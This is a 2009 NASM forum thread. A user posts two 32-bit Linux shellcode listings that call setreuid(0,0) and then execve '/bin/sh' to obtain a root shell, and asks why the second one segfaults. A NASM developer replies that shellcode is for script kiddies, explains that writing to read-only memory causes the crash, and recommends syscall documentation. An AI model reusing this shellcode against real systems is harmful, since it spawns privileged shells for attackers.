Author Topic: syscall description in detail  (Read 11924 times)

nobody

  • Guest
syscall description in detail
« on: February 25, 2009, 09:49:02 PM »
Hello,

to learn more not only about Nasm but also about fundamental priciples of the whole system and of c and nasm together I've been working with shellcode for a few weeks.
But that's not actual the problem I've got. The main problem is to understand why and when I get segmentation faults after succesfully compiling and linking.

Let me show what I mean    

; The following example works fine after I've changed a few lines:

BITS 32

; setreuid (uid_t ruid, uid_t euid)
xor eax,eax
mov al,70
xor ebx,ebx
xor ecx,ecx
int 0x80

; execve (const char *filename, char *const arg[], char *const envp[])
jmp short two
one:
pop ebx
xor eax,eax
push eax
mov al,11
xor edx,edx
push ebx
mov ecx,esp   

int 0x80

two:
call one
db '/bin/sh'

--------------------------------------------------------------

I get a shell and if prepared it's a root shell

But the next example doesn't work: I get a segmentation fault

----------------------------------------------------------------------

BITS 32

; setreuid (uid_t ruid, uid_t euid)
xor eax,eax
mov al,70
xor ebx,ebx
xor ecx,ecx
int 0x80

; execve (const char *filename, char *const arg[], char *const envp[])

jmp short two
one:
pop ebx

xor eax,eax
mov [ebx+7],al
mov [ebx+8],ebx
mov [ebx+12],eax
mov al,11
lea ecx,[ebx+8]
lea edx,[ebx+12]
int 0x80

two:
call one
db '/bin/shXAAAABBBB'

----------------------------------------

The last one is esspecially described in one book as shellcode for working under linux. I only would like to know, why it doesn't work. It seems to me, that - I read this in different books - it depends on how the stack and the registers are used. FreeBSD uses mainly the stack for arguments and linux the registers.

I would like to know, how to use the registers right in combination with the stack.
Also examples of how to use the syscalls with registers would be important to me. The syscall-table I've got shows not more  than headlines and that is not often clear; even if I read the man pages I often get not a really usefull answer.

For example: in my syscall-list execve is mentioned as  one which gets the paramerters only in ebx using a structure called pt_regs, but the other registers aren't mentioned although one must use them (eax,ebx,ecx,edx) in order to execute the programm right. And nothing is said about the stack and how much parameters at all can be used.

Would be happy for every helfull answer, that makes it clearer to me.

Thanks
Michel

Offline Frank Kotler

  • NASM Developer
  • Hero Member
  • *****
  • Posts: 2667
  • Country: us
Re: syscall description in detail
« Reply #1 on: February 26, 2009, 09:02:36 AM »
Shellcode is for script-kiddies. (IMO) Do you know any "legitimate" use for this crap?

The only difference I see between your two exploits is that you're writing to memory in the second. Are you injecting this vile slime into writeable memory? Trying to write read-only memory will segfault.

"pt_regs" sounds familiar. Phil's list? I think it just means "registers are what they are". The best asm-oriented documentation I've found is Jeff Owens' AsmRef:

http://www.linuxasmtools.net/

Includes examples of all(?) the system calls. (*legitimate* examples - not exploits!)

Best,
Frank